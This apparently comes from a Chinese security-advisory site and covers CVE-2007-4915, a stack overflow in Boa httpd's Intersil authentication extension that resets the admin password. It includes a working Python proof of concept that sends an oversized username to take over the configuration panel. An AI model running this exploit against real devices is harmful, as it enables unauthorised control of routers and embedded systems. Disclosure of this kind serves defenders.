Intersil （Boa） HTTPd基本认证密码重置漏洞

发布日期：2007-09-17
更新日期：2012-11-15受影响系统：
Boa Boa 0.93.15
描述：
--------------------------------------------------------------------------------
CVE ID: CVE-2007-4915Boa是单任务的HTTP服务器。Boa httpd没有内置的身份验证代码，Intersil扩展内存在漏洞，当要求HTTP基本身份验证凭证时，传递大于127个字符作为用户名的字符串时，会占用boa进程的栈内存，作为密码传递的字符串会覆盖管理员密码的内存值，导致攻击者将密码重置为已知值。重置后，攻击者即可访问配置面板。<*来源：luca.carettoni

链接：http://www.securityfocus.com/archive/1/archive/1/479434/100/0/threaded
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#！/usr/bin/env python
import urllib2SERVER_IP_ADDRESS = "192.168.0.1"
USERNAME = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
NEW_PASSWORD = "owned"auth_handler = urllib2.HTTPBasicAuthHandler（）
auth_handler.add_password（"LOGIN（default username & password is admin）", SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD）;
opener = urllib2.build_opener（auth_handler）
urllib2.install_opener（opener）
res = urllib2.urlopen（"http://"+SERVER_IP_ADDRESS+"/home/index.shtml"）建议：
--------------------------------------------------------------------------------
厂商补丁：Boa
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.boa.org华为多个产品弱加密算法口令泄露漏洞idev-Rentals多个HTML注入漏洞相关资讯 boa Boa安全漏洞

Ubuntu系统配置BOA服务器图文详解（07/15/2013 10:39:51）
Ttiny6410移植boa服务器（07/18/2012 09:41:28）
嵌入式ARM+SQLite3+BOA服务器用户（04/05/2012 17:13:50）

Web Boa Tiny6410控制与查看开发板（07/18/2012 09:42:49）
嵌入式Boa服务器搭建和移植（06/14/2012 16:46:19）
有关BOA服务器和CGI程序移植中遇到（04/05/2012 17:12:52）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论